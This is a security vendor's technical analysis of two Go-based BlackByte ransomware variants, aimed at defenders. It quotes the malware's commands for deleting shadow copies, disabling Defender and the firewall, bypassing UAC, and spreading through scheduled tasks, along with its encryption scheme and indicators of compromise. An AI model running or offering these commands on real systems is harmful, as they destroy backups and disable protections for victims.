Analysis of BlackByte Ransomware’s Go-Based Variants

Key Points

BlackByte is a full-featured ransomware family that first emerged around July 2021
The ransomware was originally written in C# and later redeveloped in the Go programming language around September 2021
The threat group exfiltrates data prior to deploying ransomware and leaks the stolen information if a ransom is not paid
The group has demanded multi-million dollar ransoms from some victims
BlackByte ransomware employs various anti-analysis techniques including a multitude of dynamic string obfuscation algorithms
In early versions of the ransomware, file encryption utilized a hardcoded 1,024-bit RSA public key along with a 128-bit AES key that was derived from a file retrieved from a command and control server
More recent BlackByte versions use Curve25519 Elliptic Curve Cryptography (ECC) for asymmetric encryption and ChaCha20 for symmetric file encryption

Introduction

BlackByte is a Ransomware-as-a-Service (RaaS) group that has been targeting corporations worldwide since July 2021. Previous versions of the ransomware were written in C#. More recently, the authors redeveloped the ransomware using the Go programming language. The BlackByte Go variant was used in attacks described in an FBI advisory that warned BlackByte had compromised numerous businesses, including entities in US critical infrastructure sectors. In this post, Zscaler ThreatLabz analyzes two variants of the Go-based implementation of BlackByte ransomware.

Technical Analysis

Variants

ThreatLabz has identified two variants of the Go-based variant of BlackByte. The first variant was seen in-the-wild around September 2021 and shares many similarities with the C# version including the commands executed to perform lateral propagation, privilege escalation, and file encryption algorithms. A more recent Go-based variant was introduced around February 2022. This new variant introduced many additional features and updated the file encryption algorithms. In this blog, for brevity, the Go-based BlackByte variant 1 will be referred to as BlackByte v1 and the second variant will be referred to as BlackByte v2.

Initialization

Before BlackByte performs file encryption, the ransomware first performs initialization. Most of these initialization functions are very similar or identical to the C# variant of BlackByte.

Mutex Creation

BlackByte creates a mutex using a value that is hardcoded in the malware, for example: Global\7b55551e-a59c-4252-a34a-5c80372b3014. If the mutex exists, BlackByte will terminate. This ensures that there is only one active instance of BlackByte running at a time.

Identify System Language

BlackByte ransomware resolves the victim's system language by comparing the language ID values with those shown in Table 1. If the system language matches any from this list, BlackByte will exit without performing file encryption.

Language ID

Language

1049

Russian

1058

Ukrainian

1059

Belarusian

1064

Tajik

1067

Armenian

1068

Azerbaijani Latin

1079

Georgian

1087

Kazakh

1090

Turkmen

1091

Uzbek Latin

2092

Azerbaijani Cyrillic

2115

Uzbek Cyrillic

Table 1. System languages avoided by BlackByte ransomware

These languages are specifically avoided by BlackByte to prevent encrypting files on systems that are located in Commonwealth of Independent States (CIS) countries. This likely indicates that the threat actors behind BlackByte are located in Eastern Europe and/or Russia. This is designed to reduce the threat that local law enforcement in those regions will pursue criminal prosecution against those responsible for BlackByte.

Enable Long Paths

The malware executes the following command to avoid issues that may occur when encrypting files with long path names:

C:\WINDOWS\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f

Disable Controlled Folder Access

BlackByte executes the following command to disable controlled folder access:

Set-MpPreference -EnableControlledFolderAccess Disabled

The Windows controlled folder access feature is designed to protect data from malicious applications such as ransomware. When enabled, files located in the specified protected folders can not be modified by unauthorized applications.

Delete Shadow Copies

Similar to other ransomware families, BlackByte deletes shadow copies to prevent a victim from easily recovering files from backups. There are two methods that BlackByte uses to delete shadow copies. The first executes the following PowerShell command:

$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg'+
'AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC'+'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA'+
'F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=='));Invoke-Expression $x

The Base64 encoding string when decoded is the following: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

BlackByte also executes the commands to delete shadow copies for each drive:

C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=<unit>: /on=<unit>: /maxsize=401MB
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=<unit>: /on=<unit>: /maxsize=unbounded

Process Termination and Stop / Start Services

The following commands are executed by BlackByte to stop services that may hinder file encryption:

C:\WINDOWS\system32\sc.exe config SQLTELEMETRY start= disabled
C:\WINDOWS\system32\sc.exe config SQLTELEMETRY$ECWDB2 start= disabled
C:\WINDOWS\system32\sc.exe config SQLWriter start= disabled
C:\WINDOWS\system32\sc.exe config SstpSvc start= disabled
C:\WINDOWS\system32\sc.exe config MBAMService start= disabled
C:\WINDOWS\system32\sc.exe config wuauserv start= disabled

BlackByte will also start the following services:

C:\WINDOWS\system32\sc.exe config Dnscache start= auto
C:\WINDOWS\system32\sc.exe config fdPHost start= auto
C:\WINDOWS\system32\sc.exe config FDResPub start= auto
C:\WINDOWS\system32\sc.exe config SSDPSRV start= auto
C:\WINDOWS\system32\sc.exe config upnphost start= auto
C:\WINDOWS\system32\sc.exe config RemoteRegistry start= auto

BlackByte ransomware terminates the following processes shown in Table 2 at the beginning of the execution:

uranium
processhacker
procmon
pestudio
procmon64

x32dbg
x64dbg
cffexplorer
procexp64
procexp

pslist
tcpview
tcpvcon
dbgview
rammap

rammap64
vmmap
ollydbg
autoruns
autorunsc

regmon
idaq
idaq64
immunitydebugger
wireshark

dumpcap
hookexplorer
importrec
petools
lordpe

sysinspector
proc_analyzer
sysanalyzer
sniff_hit
windbg

joeboxcontrol
joeboxserver
joeboxserver
resourcehacker
fiddler

httpdebugger
dumpit
rammap
rammap64
vmmap

agntsvc
cntaosmgr
dbeng50
dbsnmp
encsvc

excel
firefox
firefoxconfig
infopath
isqlplussvc

mbamtray
msaccess
msftesql
mspub
mydesktopqos

mydesktopservice
mysqld
mysqld-nt
mysqld-opt
Ntrtscan

ocautoupds
ocomm
ocssd
onenote
oracle

outlook
PccNTMon
powerpnt
sqbcoreservice
sql

sqlagent
sqlbrowser
sqlservr
sqlwriter
steam

synctime
tbirdconfig
thebat
thebat64
thunderbird

tmlisten
visio
winword
wordpad
xfssvccon

zoolz
veeam
backup
sql
memtas

vss
sophos
svc$
mepocs
wuauserv

filemon

Table 2. Process names terminated by BlackByte ransomware

Many of these process names are related to business applications. BlackByte kills these processes to avoid open file handle permission issues when performing file encryption of the victim's files. In addition, the list contains a large number of malware analyst tools that can be used to reverse engineer the functionality of the ransomware.

BlackByte also terminates the following services that are associated with antivirus products, backup software, and business applications including financial software, email clients, and databases as shown below in Table 3.

klvssbridge64
vapiendpoint
ShMonitor
Smcinst
SmcService

SntpService
svcGenericHost
swi_
TmCCSF
tmlisten

TrueKey
TrueKeyScheduler
TrueKeyServiceHelper
WRSVC
McTaskManager

OracleClientCache80
mfefire
wbengine
mfemms
RESvc

mfevtp
sacsvr
SAVAdminService
SAVService

SepMasterService

PDVFSService
ESHASRV
SDRSVC
FA_Scheduler
KAVFS

KAVFSGT
kavfsslp
klnagent
macmnsvc
masvc

MBAMService
MBEndpointAgent
McShield
audioendpointbuilder
Antivirus

AVP
DCAgent
bedbg
EhttpSrv
MMS

ekrn
EPSecurityService
EPUpdateService
ntrtscan
EsgShKernel

msexchangeadtopology
AcrSch2Svc
MSOLAP$TPSAMA
Intel(R) PROSet Monitoring

msexchangeimap4

ARSM
unistoresvc_1af40a
ReportServer$TPS
MSOLAP$SYSTEM_BGC
W3Svc

MSExchangeSRS
ReportServer$TPSAMA
Zoolz 2 Service
MSOLAP$TPS

aphidmonitorservice

SstpSvc
MSExchangeMTA
ReportServer$SYSTEM_BGC
Symantec System Recovery
UI0Detect

MSExchangeSA
MSExchangeIS
ReportServer
MsDtsServer110
POP3Svc

MSExchangeMGMT
SMTPSvc
MsDtsServer
IisAdmin
MSExchangeES

EraserSvc11710
Enterprise Client Service
MsDtsServer100
NetMsmqActivator
stc_raw_agent

VSNAPVSS
PDVFSService
AcrSch2Svc
Acronis

CASAD2DWebSvc

CAARCUpdateSvc
McAfee
avpsus
DLPAgentService
mfewc

BMR Boot Service
DefWatch
ccEvtMgr
ccSetMgr
SavRoam

RTVscan
QBFCService
QBIDPService
Intuit.QuickBooks.FCS

QBCFMonitorService

YooIT
zhudongfangyu

Table 3. Service names terminated by BlackByte ransomware

Windows Firewall

BlackByte disables the Windows firewall via the command:

netsh advfirewall set allprofiles state off

Windows Defender

The ransomware executes the following command to delete task manager, resource monitor, and stop the Windows Defender service:

cmd /c del C:\Windows\System32\Taskmgr.exe /f /q & del C:\Windows\System32\resmon.exe /f /q &
powershell -command "$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String
('V'+'wBp'+'A'+'G4AR'+'AB'+'lAG'+'YAZQBuAGQA'));Stop-Service -Name $x;Set-Service -StartupType Disabled

The Base64 encoded string above decodes to WinDefend.

Raccine Anti-Ransomware

BlackByte terminates and uninstalls an anti-ransomware product known as Raccine. The Raccine processes that are terminated are raccine.exe and raccinesettings.exe. To uninstall Raccine, BlackByte deletes the following registry keys and values:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Raccine Tray
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\Raccine
HKEY_CURRENT_USER\SOFTWARE\Raccine
HKEY_LOCAL_MACHINE\SOFTWARE\Raccine

BlackByte then deletes Raccine's scheduled task via the command:

C:\WINDOWS\system32\schtasks.exe /DELETE /TN "\"Raccine Rules Updater\"" /F

Privilege Escalation

The ransomware executes the following commands to disable UAC remote restrictions:

C:\WINDOWS\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

BlackByte sets the EnableLinkedConnections registry value to force symbolic links to be written to link logon sessions as follows:

C:\WINDOWS\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

In BlackByte v2, an additional privilege escalation method was added that exploits the CMSTPLUA COM interface to bypass UAC. The ShellExec method of the interface ICMLuaUtil can be invoked with arbitrary commands with elevated privileges using the ElevationMoniker Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}. This allows BlackByte v2 to execute the svchost.exe process that it injects into with elevated privileges. This privilege escalation technique has also been utilized by other ransomware groups including REvil and LockBit.

Lateral Propagation

BlackByte ransomware performs network enumeration and can propagate across a local network. First it executes the following commands to enable network discovery and file and printer sharing:

C:\WINDOWS\system32\cmd.exe /c netsh advfirewall firewall set rule "group=\"Network Discovery\"" new enable=Yes
C:\WINDOWS\system32\cmd.exe /c netsh advfirewall firewall set rule "group=\"File and Printer Sharing\"" new enable=Yes

The following commands are then executed to discover other computers and network file shares:

net view
arp -a

BlackByte loads the Active Directory module RSAT-AD-PowerShell and queries for other computers via the following commands:

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe Install-WindowsFeature -Name \"RSAT-AD-PowerShell\" –IncludeAllSubFeature

powershell -command "Import-Module ActiveDirectory;Get-ADComputer -Filter * -Properties * | FT Name"

If the -a flag is passed via the command-line, BlackByte attempts to copy itself to remote computer's public folders via the administrative share \\<remote_computer_name>\c$\Users\Public\<filename.exe>. If that attempt is unsuccessful, BlackByte will default to the path: \\<remote_computer_name>\Users\Public\<filename.exe>. BlackByte uses the Windows task scheduler to execute the ransomware on the remote host using the following command:

C:\Windows\system32\schtasks.exe /Create /S <remote_computername> /TN <taskname> /TR "C:\Users\Public\<filename> -s <passphrase>" /ru SYSTEM /sc onlogon /RL HIGHEST /f

In BlackByte v2, the filename and task name are pseudorandomly generated using a function that produces eight upper and lowercase alphabetic and numeric characters (e.g., BqgDOVYL.exe and KYL8EpE9, respectively). BlackByte v1 uses a hardcoded filename and command-line argument complex.exe -single and the hardcoded task name asd.

After scheduling the task, the remote BlackByte binary is executed using the command:

C:\Windows\system32\schtasks.exe /S <remote_computername> /Run /TN <taskname>

After the task is executed, BlackByte deletes the remote task using the command:

C:\Windows\system32\schtasks.exe /Delete /S <remote_computername> /TN <taskname> /f

BlackByte then deletes the copy of itself on the remote host network share. BlackByte also attempts to access administrative shares A$ through Z$ and the folders shown in Table 4.

Users
Backup
Veeam
Consejo
homes

home
media
common
Storage Server
Public

Web
Images
Downloads
BackupData

ActiveBackupForBusiness

Backups
NAS-DC
DCBACKUP
DirectorFiles
share

Table 4. Network shares targeted by BlackByte ransomware

Check for Analysis Tools

The malware checks the following DLL modules in memory shown in Table 5 and exits if they are present:

DLL Filename
Description

DBGHELP.DLL
Windows DbgHelp Library

SbieDll.dll
Sandboxie

SxIn.dll
Qihu 360 Total Security

Sf2.dll
Avast Antivirus

snxhk.dll
Avast Antivirus

cmdvrt32.dll
COMODO Internet Security

Table 5. DLLs Identified by BlackByte ransomware

Disable Debugging

BlackByte attempts to prevent debugging tools from monitoring and attaching to various processes by removing the following registry values under SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options:

vssadmin.exe
wbadmin.exe
bcdedit.exe
powershell.exe
diskshadow.exe
net.exe
taskkill.exe
wmic.exe
fsutil.exe

Process Injection

BlackByte v1 injects the ransomware code in an instance of regedit.exe, while BlackByte v2 injects itself into an instance of svchost.exe. After the process is injected with the ransomware code, the file encryption is then performed in the context of the regedit.exe or svchost.exe process. BlackByte then deletes its original binary on disk by executing the command:

C:\Windows\system32\cmd.exe /c ping 1.1.1.1 -n 10 > Nul & Del <blackbyte_filepath.exe> /F /Q

The ping command is used to delay the file deletion by 10 seconds. The process injection functionality may be able to bypass some security software detections.

Unmount Virtual Machine Images

In order to identify virtual machines on the victim's system, BlackByte will execute the command:

powershell Get-VM

If any virtual machine files are located, BlackByte will attempt to unmount the image by executing the following command line:

powershell.exe Dismount-DiskImage -ImagePath <filename.vhd>

Backup Volumes

The malware executes mountvol.exe to try to mount additional volumes:

C:\WINDOWS\system32\mountvol.exe A: \\?\Volume{[GUID]}\
C:\WINDOWS\system32\mountvol.exe B: \\?\Volume{[GUID]}\
C:\WINDOWS\system32\mountvol.exe E: \\?\Volume{[GUID]}\
C:\WINDOWS\system32\mountvol.exe F: \\?\Volume{[GUID]}\

This is likely an attempt to mount and encrypt backup volumes to further prevent file recovery after encryption.

File Encryption

BlackByte enumerates all physical drives and network shares skipping files that contain the following substrings in Table 6:

blackbyte
ntdetect.com
bootnxt
ntldr
recycle.bin

bootmgr
thumbs.db
ntuser.dat
bootsect.bak
autoexec.bat

iconcache.db
bootfont.bin

Table 6. BlackByte ransomware file substring filter list

BlackByte avoids the following extensions shown in Table 7.

url
msilog
log
ldf
lock

theme
msi
sys
wpx
cpl

adv
msc
scr
key
ico

dll
hta
deskthemepack
nomedia
msu

rtp
msp
idx
ani
386

diagcfg
bin
mod
ics
com

hlp
spl
nls
cab
exe

diagpkg
icl
ocx
rom
prf

themepack
msstyles
icns
mpa
drv

cur
diagcab
cmd
shs

Table 7. File extensions skipped by BlackByte ransomware

BlackByte will also skip files located in the following directories shown in Table 8.

bitdefender
trend micro
avast software
intel
common files

programdata
windowsapps
appdata
mozilla
application data

google
windows.old
system volume information
program files (x86)
boot

tor browser
windows
intel
perflogs
msocache

Table 8. Directories whitelisted by BlackByte ransomware

BlackByte optimizes encryption speed based on the targeted file size according to the following rules:

Filesize
Encryption Algorithm

Size <= 5MB
Encrypt the entire file

15MB >= Size > 5MB
Encrypt the first 1MB and last 1MB

150MB >= Size > 15MB
Encrypt the first 5MB and last 5MB

Size > 150MB
Encrypt the first 50MB and last 50MB

BlackByte renames encrypted files with the extension .blackbyte. The ransomware creates a DefaultIcon registry key under HKEY_CLASSES_ROOT\.blackbyte that points to an icon file, so that every file that is encrypted will show this icon in Windows explorer. In addition, the registry names s1159 and s2359 are set to BLACKBYTE under HKEY_CURRENT_USER\Control Panel\International. These registry values control the time format for AM/PM. As a result, Windows will show BLACKBYTE instead of AM/PM as shown below in Figure 2.

Figure 2. BlackByte AM/PM time format modification

This time format modification is performed by executing the commands:

reg add "HKCU\Control Panel\International" /v s1159 /t REG_SZ /d BLACKBYTE /f
reg add "HKCU\Control Panel\International" /v s2359 /t REG_SZ /d BLACKBYTE /f

File Encryption Algorithms (Variant 1)

BlackByte v1 must be executed with the command line argument -single followed by a SHA256 hash. This hash is combined with a TOR onion URL (e.g., hxxp://7oukjxwkbnwyg7cekudzp66okrchbuubde2j3h6fkpis6izywoj2eqad[.]onion/). The SHA256 hash given as an argument is concatenated to the onion URL to build the URL of the victim ransom portal that is embedded in the ransom note. This URL is substituted in the [LINK] field of the ransom note template.

When BlackByte v1 is executed, the malware tries to connect to a hardcoded URL that hosts a file that is involved in the construction of an AES key that is used to encrypt a victim's files. An example URL used for this purpose was hxxps://185.93.6[.]31/mountain.png. The mechanism used to build the AES key is very similar to the C# variant.

After the content of the file mountain.png is downloaded, BlackByte reads the first 16 bytes of the file into a buffer and 24 bytes at the offset 0x410 of the file into another buffer. These 24 bytes are used as key to create and initialize a NewTripleDESCipher object from the Go Cryptographic API. This object is used to decrypt the first 16 bytes of the file mountain.png. The resulting 16-byte buffer will be used as a PBKDF2 password to derive the AES key that will be used to encrypt the victim's files. The BlackByte PBKDF2 algorithm uses SHA1 as the hashing function and 1,000 iterations to derive the AES key. The password is converted to unicode and the unicode string BLACKBYTE_IS_COOL is used as the salt. The following example Python code can be used to derive the AES key used for file encryption.

Figure 3. Python code to decrypt BlackByte v1 files with the file (e.g., mountain.png) downloaded from the C2 server

Victim's files are encrypted with AES using CBC mode. The first 16 bytes of the PBKDF2 derived key are used as AES key, and the same 16 bytes are used as the initialization vector (IV). The same AES key is used to encrypt all the files on a victim's machine.

The PBKDF2 password is encrypted with a hardcoded 1,024-bit RSA public key and the resulting RSA-encrypted value is encoded with Base64. This Base64 encoded string is substituted in the [KEY] field in the ransom note template. The threat actor can decrypt the PBKDF2 password with their corresponding RSA private key, derive the AES key, and thereafter, decrypt the victim's encrypted files. The following is an example RSA public key that was hardcoded in BlackByte:

—–BEGIN PUBLIC KEY—–
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDUBwECQuQiVGorPYvHrJM11OWV
E1PS8gaBqIAfPaR1rQHUEXu3iX/da/dCtV8Z27/SIA/ZYUNhTyUsX9Snjz8zve90
QAiG1c/BS81WWRax7M7i1rESStVwOaUDAj5w6cz9GwDMGYI+wve9Qyjtw5R6hr5I
qlIEig1Wy1X27vUC2wIDAQAB
—–END PUBLIC KEY—–

Ransom Note and BlackByte Icon (Variant 1)

The BlackByte ransom note and an image containing an icon file are stored as Base64 encoded strings in the binary. After the encryption of the victim's files, the ransom note is written to a file named BlackByteRestore.txt, and the previously mentioned icon file is written to a file named BB.ico. An example BlackByte v1 ransom note template is shown below in Figure 4. The BlackByte logo uses the extended ASCII characters of the 8-bit code page 437 to create 3-D block letters.

Figure 4. Go-based BlackByte v1 ransom note template

File Encryption Algorithms (Variant 2)

The second variant of BlackByte ransomware does not require a network connection to start encryption. In addition, the ransomware's command-line parameters were modified. BlackByte v2 requires two command line parameters:

sample.exe <flags> <passphrase>

The first parameter is a flag (e.g., -a) that controls specific behaviors of the ransomware (e.g., to propagate across a network), while the second parameter is a passphrase (e.g., 54726956) that is verified before file encryption commences. If BlackByte is not provided with any command-line arguments, the ransomware prints out the phrase BlackByte ransomware, 8-th generation, the most destructive of all ransomware products, real natural disaster. and exits.

BlackByte v2 removed the RSA and AES file encryption algorithms from the ransomware. The encryption algorithms were replaced with Curve25519 elliptic curve cryptography for asymmetric encryption and ChaCha for symmetric algorithm. The Curve25519 functions are statically compiled within BlackByte using Go library code. BlackByte generates a random 32-byte buffer per file using the Windows API function RtlGenRandom(). This random value is used as a file's secret key. The file's public key is calculated as follows:

file_public_key = Curve25519(file_secret_key, base_point = 0x9)

The threat actor's Curve25519 public key is hardcoded in the binary and stored as a Base64 encoded string. For the sample with the SHA256 hash ffc4d94a26ea7bcf48baffd96d33d3c3d53df1bb2c59567f6d04e02e7e2e5aaa, the hardcoded Curve25519 public key was the string:

2BSTzcpdqRW/a2DRT3TiL9lN5INRmmn1lCQWzZhkfQs= (d81493cdca5da915bf6b60d14f74e22fd94de483519a69f5942416cd98647d0b)

The shared secret is derived as follows:

shared_secret = Curve25519(file_secret_key, blackbyte_public_key)

The shared secret is hashed with SHA256 to derive a 32-byte ChaCha encryption key. The ChaCha encryption key is then hashed again with SHA256 to derive the ChaCha nonce (using 12 bytes starting at offset 10). Once the ChaCha key parameters have been derived, they will be used to encrypt the file's content. The encrypted data is written to the file (overwriting the original content). Finally, the victim's 32-byte public key is concatenated to the encrypted content of the file. The BlackByte v2 encryption algorithm is shown below in Figure 5.

Figure 5. BlackByte v2 file encryption algorithm

The threat actor can use the file's public key together with the threat actor's secret key to recover the shared secret and use it to decrypt the encrypted data as follows:

shared_secret = Curve25519(blackbyte_secret_key, file_public_key)

The following Python code in Figure 6 can be used to decrypt BlackByte encrypted data from a file that has been encrypted if the threat actor's private key is obtained:

Figure 6. Python code to decrypt BlackByte v2 files with the threat actor's private key

BlackByte v2 also encrypts the filename after encryption. The encryption is a simple XOR layer with a hardcoded key, followed by Base64 encoding as shown in Figure 7.

Figure 7. BlackByte v2 filename encryption

In the analyzed sample, the XOR key was fuckyou123. After a filename has been encrypted, the file is renamed and the .blackbyte extension is concatenated.

Ransom Note and BlackByte Icon (Variant 2)

BlackByte v2 introduced some improvements to storing the ransom note and icon file. The Base64 encoded blocks for the ransom note and icon file added an XOR-based encryption layer. The XOR key to decrypt the ransom note and icon file is embedded in the ransomware as an obfuscated string. The icon file is written to the victim's %APPDATA% directory using a randomly generated filename consisting of six upper and lowercase alphabetic and numeric characters (e.g., i2uOJh.ico).

BlackByte v2 contains a hardcoded TOR onion URL and path for the victim portal rather than relying on the command-line for the path value. BlackByte v2 also added a hardcoded password that is required to access the victim ransom portal. An example password is:

gkaW_#DD[Aw_JTB@luXpJBdye6eLr@{bx5pHFA)T5FpMYJC]f|@

The BlackByte v2 ransom note template is shown below in Figure 8. The [LINK] substring in the ransom note is replaced with the hardcoded BlackByte victim URL and the [PASSW] substring is replaced with the victim-specific password for the ransom portal.

Figure 8. BlackByte v2 ransom note template

An example ransom note when populated after file encryption has been performed for BlackByte v2 is shown in Figure 9.

Figure 9. BlackByte v2 ransom note

After BlackByte encrypts files, the ransom note is written to each directory, the encrypted files are renamed, and their icons are replaced by the BlackByte icon.

Ransom Portal and Leak Site

When a victim accesses the link in the ransom portal, they are instructed to enter the access key from the ransom note as shown in Figure 10.

Figure 10. BlackByte victim ransom portal

After a victim authenticates, they are provided the ransom demand and instructions how to purchase Bitcoin. There is also a live chat feature as shown in Figure 11.

Figure 11. BlackByte ransom negotiation portal

Victims are further pressured to pay the ransom, or risk having their data publicly leaked on their TOR hidden service as shown in Figure 12.

Figure 12. BlackByte victim leak site

Print Bombing

In addition to dropping a ransom note on the victim's machine, the ransomware sends a message to be printed by any connected printers. The printed ransom message is an RTF file with the content shown below:

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 10.0.19041}\viewkind4\uc1
\pard\sa200\sl276\slmult1\qc\f0\fs56\lang9 Your HACKED by BlackByte team.\par
Connect us to restore your system.\fs22\par
\fs56 Your HACKED by BlackByte team.\par
Connect us to restore your system.\fs22\par
\fs56 Your HACKED by BlackByte team.\par
Connect us to restore your system.\fs22\par
\fs56 Your HACKED by BlackByte team.\par
Connect us to restore your system.\fs22\par
\fs56 Your HACKED by BlackByte team.\par
Connect us to restore your system.\fs22\par
\fs56 Your HACKED by BlackByte team.\par
Connect us to restore your system.\fs22\par

\pard\sa200\sl276\slmult1\par
}

In BlackByte v1, the message is written to the file C:\Users\tree.dll and the following command is executed to print it:

C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1 ,75) do start wordpad.exe /p C:\\Users\\tree.dll

In addition, a task named Task is created to print the message every hour:

C:\WINDOWS\system32\schtasks.exe /create /np /sc HOURLY /tn Task /tr "C:\Windows\System32\cmd.exe
/c for /l %x in (1,1,75) do start wordpad.exe /p C:\Users\tree.dll" /st 07:00

In BlackByte v2, the text of the message is written to a file with a random name consisting of six upper and lowercase alphabetic and numeric characters. The task name is also created randomly consisting of eight upper and lowercase alphabetic and numeric characters. An example task command to print the ransom message is shown below:

C:\WINDOWS\system32\schtasks.exe /create /np /sc HOURLY /tn 4y77VPNo /tr "C:\Windows\System32\cmd.exe
/c for /l %x in (1,1,75) do start %SystemDrive%\Program Files\Windows NT\Accessories\WordPad.exe /p
C:\Users\1HoWkK.dll" /st 07:00

Anti-Analysis / Anti-Forensics Techniques

String Obfuscation

Both Go-based BlackByte variants encrypt most strings using a tool similar to AdvObfuscator. Each string is decrypted using a unique algorithm with polymorphic code that implements different operations xor, addition, subtraction, etc. In the examples below, the encrypted strings in Figure 13 are built and decrypted from arguments on the stack.

Figure 13. BlackByte string obfuscation examples

Modified UPX Packer

In addition to string obfuscation, BlackByte samples are typically packed with UPX. In BlackByte v1, all of the samples observed by ThreatLabz were packed with the standard UPX packer and could be unpacked via the command-line parameter -d. The early samples of BlackByte v2 were also packed with the standard UPX packer. However, the most recent BlackByte samples (since March 2022) are packed with a modified version of UPX. The names of the sections have been renamed from UPX0 and UPX1 to BB0 and BB1, respectively. Figure 14 shows an example BlackByte v2 sample with the modified UPX headers.

Figure 14. BlackByte v2 altered UPX header

Antivirus Detection

Due to BlackByte's anti-analysis features, polymorphic code, and heavy obfuscation many antivirus products have very low detection rates. For example, the BlackByte sample with the SHA256 534f5fbb7669803812781e43c30083e9197d03f97f0d860ae7d9a59c0484ace4 has an antivirus detection rate of 4/61 at the time of publication.

Conclusion

BlackByte is a full-featured ransomware family operated by a threat group that continues to breach organizations and demand large ransom amounts. The threat group also performs double extortion attacks by stealing an organization's files and leaking them online if the ransom is not paid. The ransomware code itself is regularly updated to fix bugs, bypass security software, and hinder malware analysis. The encryption algorithms have also been improved to be more secure and prevent file recovery. This demonstrates that the threat group will likely continue to improve the ransomware and remain a significant threat to organizations.

Cloud Sandbox Detection

Zscaler's multilayered cloud security platform detects indicators at various levels, as shown below:

Win64.Ransom.Blackbyte

Indicators of Compromise

IoC Type
Value

BlackByte v1 Packed Sample
1df11bc19aa52b623bdf15380e3fded56d8eb6fb7b53a2240779864b1a6474ad

BlackByte v1 Packed Sample
388163c9ec1458c779849db891e17efb16a941ca598c4c3ac3a50a77086beb69

BlackByte v1 Unpacked Sample
44a5e78fce5455579123af23665262b10165ac710a9f7538b764af76d7771550

BlackByte v1 Unpacked Sample
6f36a4a1364cfb063a0463d9e1287248700ccf1e0d8e280e034b02cf3db3c442

BlackByte v2 Packed Sample
ffc4d94a26ea7bcf48baffd96d33d3c3d53df1bb2c59567f6d04e02e7e2e5aaa

BlackByte v2 Packed Sample
9103194d32a15ea9e8ede1c81960a5ba5d21213de55df52a6dac409f2e58bcfe

BlackByte v2 Packed Sample
e434ec347a8ea1f0712561bccf0153468a943e16d2cd792fbc72720bd0a8002e

BlackByte v1 Onion URL
hxxp://7oukjxwkbnwyg7cekudzp66okrchbuubde2j3h6fkpis6izywoj2eqad.]onion

BlackByte v2 Onion URL
hxxp://fyk4jl7jk6viteakzzrxntgzecnz4v6wxaefmbmtmcnscsl3tnwix6yd.]onion

BlackByte v2 Onion URL
hxxp://p5quu5ujzzswxv4nxyuhgg3fjj2vy2a3zmtcowalkip2temdfadanlyd.]onion

BlackByte v1 AES Key Seed URL
hxxps://185.93.6[.]31/mountain.png

References

https://redcanary.com/blog/blackbyte-ransomware/

Click to access 220211.pdf

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/
https://www.bleepingcomputer.com/forums/t/755181/blackbyte-ransomware-blackbyte-support-topic/

*** This is a Security Bloggers Network syndicated blog from Blog Category Feed authored by Javier Vicente. Read the original post at: https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants